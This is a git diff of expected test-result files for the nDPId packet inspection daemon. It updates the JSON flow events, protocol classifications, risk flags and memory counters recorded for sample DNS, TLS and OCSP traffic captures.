-00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1449652786152,"flow_last_seen":1449652788767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1683,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 
+00827{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1449652786152,"flow_last_seen":1449652788767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1683,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Crashlytics","breed":"Acceptable","category":"DataTransfer"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652786167,"flow_last_seen":1449652786398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":53356,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1449652788109,"flow_last_seen":1449652791955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5041,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1449652788109,"flow_last_seen":1449652791955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5041,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.OCS","breed":"Fun","category":"Media"}} 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1449652797357,"flow_last_seen":1449652797774,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} -00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":751,"flow_first_seen":1449652787983,"flow_last_seen":1449652839371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1449652797357,"flow_last_seen":1449652797774,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":1580,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":751,"flow_first_seen":1449652787983,"flow_last_seen":1449652839371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"}} 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652786135,"flow_last_seen":1449652787495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1449652787003,"flow_last_seen":1449652787811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":373,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1449652798305,"flow_last_seen":1449652798887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 
+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1449652787003,"flow_last_seen":1449652787811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":373,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1449652798305,"flow_last_seen":1449652798887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} -00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","packets-captured":946,"packets-processed":946,"total-skipped-flows":0,"total-l4-payload-len":12361,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":18,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":20,"total-idle-flows":20,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":108,"global_ts_msec":1449652846380} 
+00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","packets-captured":946,"packets-processed":946,"total-skipped-flows":0,"total-l4-payload-len":12361,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":18,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":20,"total-idle-flows":20,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":106,"global_ts_msec":1449652846380} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 946/946 ~~ skipped flows.............: 0 @@ -114,9 +112,9 @@ ~~ total active/idle flows...: 20/20 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5927969 bytes -~~ total memory freed........: 5927969 bytes -~~ total allocations/frees...: 119161/119161 +~~ total memory allocated....: 6061603 bytes +~~ total memory freed........: 6061603 bytes +~~ total allocations/frees...: 121923/121923 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 449 chars ~~ json string max len.......: 1481 chars diff --git a/test/results/ocsp.pcapng.out b/test/results/ocsp.pcapng.out index 8570b48f0..c747423ca 100644 --- a/test/results/ocsp.pcapng.out +++ b/test/results/ocsp.pcapng.out 
@@ -4,66 +4,66 @@ 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623221248283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623221248283,"pkt":"pJGxgjQ56CrqthSFCABFAAA07YhAAIAG7ObAqAHjbUbwgsKVAFBAnkIeAAAAAIAC+vAOKQAAAgQFtAEDAwgBAQQCGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARhcrEQ=="} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623221248292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":28,"thread_ts_msec":1623221248292,"pkt":"6CrqthSFpJGxgjQ5CABFAAAwAABAADUGJXRtRvCCwKgB4wBQwpWhnw3QQJ5CH3ASOQg1lwAAAgQFtAEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx3fu3"} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623221248311,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":20,"thread_ts_msec":1623221248311,"pkt":"pJGxgjQ56CrqthSFCABFAAAo7YlAAIAG7PHAqAHjbUbwgsKVAFBAnkIfoZ8N0VAQAgGYawAAAAAAAAAAGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjLK1pA=="} 
-00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221248283,"flow_last_seen":1623221248318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":385,"flow_tot_l4_payload_len":385,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623221248318,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"ocsp07.actalis.it","url":"ocsp07.actalis.it\/VA\/AUTH-ROOT\/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEEWXMtjzGMt1k6L0aA%2BQ6tk%3D","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/10.0"}} +00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623221248283,"flow_last_seen":1623221248318,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":385,"flow_tot_l4_payload_len":385,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623221248318,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"ocsp07.actalis.it","url":"ocsp07.actalis.it\/VA\/AUTH-ROOT\/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSw4x5v4bTlizjNRmTdkYSy7q0R9gQUUtiIOsifeGbtifN7OHCUyQICNtACEEWXMtjzGMt1k6L0aA%2BQ6tk%3D","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/10.0"}} 
00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":24,"packets-processed":23,"total-skipped-flows":0,"total-l4-payload-len":8359,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1623222699655} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222699655,"flow_last_seen":1623222699655,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222699655,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1623222699655,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222699655,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N6FAAEAG+ZTAqAGAjvq4Y9OKAFA7VkTpAAAAAKAC+vDDlAAAAgQFtAQCCAqSLZmsAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx0lW5"} 
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1623222699659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222699659,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8l3UAADkG4ECO+rhjwKgBgABQ04qgD55GO1ZE6qAS\/\/9O2gAAAgQFlgQCCAovwgGfki2ZrAEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACT46ug"} 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1623222699662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623222699662,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0N6JAAEAG+ZvAqAGAjvq4Y9OKAFA7VkTqoA+eR4AQAfZ7iwAAAQEICpItmbQvwgGfGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqAZWVw=="} -00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222699655,"flow_last_seen":1623222699662,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623222699662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"},"http": {"hostname":"ocsp.pki.goog","url":"ocsp.pki.goog\/gts1o1core","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
-00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1623221248283,"flow_last_seen":1623221313421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8359,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1623222699772,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222699655,"flow_last_seen":1623222699662,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623222699662,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"},"http": {"hostname":"ocsp.pki.goog","url":"ocsp.pki.goog\/gts1o1core","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1623221248283,"flow_last_seen":1623221313421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8359,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1623222699772,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"109.70.240.130","src_port":49813,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222785863,"flow_last_seen":1623222785863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222785863,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222785863,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623222785863,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8JGFAAEAGl83AqAGAXHpf66rQAFDHRQtaAAAAAKAC+vAjygAAAgQFtAQCCAq0VnigAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB2OTsI"} 
